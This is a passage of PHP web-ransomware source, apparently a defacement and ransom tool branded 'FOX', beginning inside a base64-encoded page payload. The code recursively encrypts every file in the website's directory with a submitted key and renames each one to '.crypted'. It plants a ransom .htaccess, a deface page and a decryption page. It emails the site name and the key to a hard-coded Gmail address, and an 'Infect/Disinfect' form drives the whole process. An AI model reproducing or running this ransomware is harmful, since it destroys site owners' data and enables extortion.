ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCj8+CjxjZW50ZXI+CjxwcmU+CjxjZW50ZXI+PGgxPgo8Zm9udCBjb2xvcj0iIzU2RjMwNyI+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICBfX19fX19fX19fIF8gIF9fCiAgIC8gX19fXy8gX18gXCB8LyAvCiAgLyAvXyAgLyAvIC8gLyAgIC8gCiAvIF9fLyAvIC9fLyAvICAgfCAgCi9fLyAgICBcX19fXy9fL3xffCAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAKPC9mb250Pjxicj4KPGgyPjxmb250IGNvbG9yPXllbGxvdz5KdXN0IFB1dCBZb3VyIEVuY3J5cHRpb24vRGVjcnlwdGlvbiBLZXkgSGVyZTwvaDI+IDwvZm9udD4KPC9wcmU+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIHN0eWxlPSIgdGV4dC1hbGlnbjogY2VudGVyOyI+Cjxmb250IGNvbG9yPSIjNTZGMzA3Ij4KICAgICAgPGxhYmVsPktleSA6IDwvbGFiZWw+CiAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJrZXkiIGNsYXNzPSJpbnB1dGUiIHBsYWNlaG9sZGVyPSJLRVkgRU5DL0RFQyI+CiAgICAgIDxzZWxlY3QgbmFtZT0ibWV0aG9kIiBjbGFzcz0ic2VsZWN0ZSI+CiAgICAgICAgIDxvcHRpb24gdmFsdWU9IjEiPkluZmVjdGlvbjwvb3B0aW9uPgogICAgICAgICA8b3B0aW9uIHZhbHVlPSIyIj5EaXNpbmZlY3Rpb248L29wdGlvbj4KICAgICAgPC9zZWxlY3Q+CiAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgY2xhc3M9InN1Ym1pdGUiIHZhbHVlPSJTdWJtaXQiIC8+CjwvZm9ybT4KPD9waHAKfT8+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4KCgo8P3BocAo/Pgo="))){        echo '<i class="fa fa-smile-o" aria-hidden="true"></i>  decrypt.php (This is the Decryption Page)<br>';
            }
        }
    }
    public function shcpackUnstall() {
        if (file_exists(".fox")) {
            if (unlink(".htaccess") && unlink("fox.php") && unlink("decrypt.php")) {
                echo '<i class="fa fa-smile-o" aria-hidden="true"></i> <font color=#FFFF00> .htaccess (Ransomware .htaccess file)<br></font>';
                echo '<i class="fa fa-smile-o" aria-hidden="true"></i> <font color=#FFFF00> fox.php (This is the Deface Page)<br></font>';
                echo '<i class="fa fa-smile-o" aria-hidden="true"></i> <font color=#FFFF00> decrypt.php (This is the Decryption Page)<br></font>';
            }
            rename(".fox", ".htaccess");
        }
    }
    public function plus() {
        flush();
        ob_flush();
    }
    public function locate() {
        return getcwd();
    }
    public function shcdirs($dir, $method, $key) {
        switch ($method) {
            case '1':
                deRanSomeware::shcpackInstall();
            break;
            case '2':
                deRanSomeware::shcpackUnstall();
            break;
        }
        foreach (scandir($dir) as $d) {
            if ($d != '.' && $d != '..') {
                $locate = $dir . DIRECTORY_SEPARATOR . $d;
                if (!is_dir($locate)) {
                    if (deRanSomeware::kecuali($locate, "033.php") && deRanSomeware::kecuali($locate, ".png") && deRanSomeware::kecuali($locate, ".htaccess") && deRanSomeware::kecuali($locate, "fox.php") && deRanSomeware::kecuali($locate, "decrypt.php") && deRanSomeware::kecuali($locate, ".fox")) {
                        switch ($method) {
                            case '1':
                                deRanSomeware::shcEnCry($key, $locate);
                                deRanSomeware::shcEnDesDirS($locate, "1");
                            break;
                            case '2':
                                deRanSomeware::shcDeCry($key, $locate);
                                deRanSomeware::shcEnDesDirS($locate, "2");
                            break;
                        }
                    }
                } else {
                    deRanSomeware::shcdirs($locate, $method, $key);
                }
            }
            deRanSomeware::plus();
        }
        deRanSomeware::report($key);
    }
    public function report($key) {
        $message.= "=========     Details    =========
";
        $message.= "Website : " . $_SERVER['HTTP_HOST'];
        $message.= "Key     : " . $key;
        $message.= "Decryption Key Is
";
        $subject = "Ransomeware Decryption Key
";
        $ducker = "tfoox19@gmail.com";
        $headers = "From: Ransomware <ransomeware@n00b.today>
";
        mail($ducker, $subject, $message, $headers);
    }
    public function shcEnDesDirS($locate, $method) {
        switch ($method) {
            case '1':
                rename($locate, $locate . ".crypted");
            break;
            case '2':
                $locates = str_replace(".crypted", "", $locate);
                rename($locate, $locates);
            break;
        }
    }
    public function shcEnCry($key, $locate) {
        $data = file_get_contents($locate);
        $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM);
        $encrypted = base64_encode( //encrption: change it
        $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv));
        if (file_put_contents($locate, $encrypted)) {
            echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#FF0000">Locked</font> (<font color="#40CE08">Success</font>) <font color="#00FFFF">--></font> <font color="#2196F3">' . $locate . '</font> <br>';
        } else {
            echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Unsuccessful</font>) <font color="#00FFFF">--></font> ' . $locate . ' <br>';
        }
    }
    public function shcDeCry($key, $locate) {
        $data = base64_decode(file_get_contents($locate));
        $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
        $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "");
        if (file_put_contents($locate, $decrypted)) {
            echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#00FFFF">--></font> <font color="#2196F3">' . $locate . '</font> <br>';
        } else {
            echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Unsuccessful</font>) <font color="#00FFFF">--></font> <font color="#2196F3">' . $locate . '</font> <br>';
        }
    }
    public function kecuali($ext, $name) {
        $re = "/({$name})/";
        preg_match($re, $ext, $matches);
        if ($matches[1]) {
            return false;
        }
        return true;
    }
}
if ($_POST['submit']) {
    switch ($_POST['method']) {
        case '1':
            deRanSomeware::shcdirs(deRanSomeware::locate(), "1", $_POST['key']);
        break;
        case '2':
            deRanSomeware::shcdirs(deRanSomeware::locate(), "2", $_POST['key']);
        break;
    }
} else {
?>
<center>
<pre>
<center><h1>
<font color="#B4164D">                                                                      
 
     __________ _  __
   / ____/ __ \ |/ /
  / /_  / / / /   / 
 / __/ / /_/ /   |  
/_/    \____/_/|_|  

</font><br>
<h2><font color=yellow>Just Put Your Encryption/Decryption Key Here</h2> </font>
</pre>
<form action="" method="post" style=" text-align: center;">
<font color="#B4164D">
      <label>Key : </label>
      <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
      <select name="method" class="selecte">
         <option value="1">Infect</option>
         <option value="2">Disinfect</option>
      </select>
      <input type="submit" name="submit" class="submite" value="Submit" />
</form>
<?php
} ?>
</div>
</body>
</html>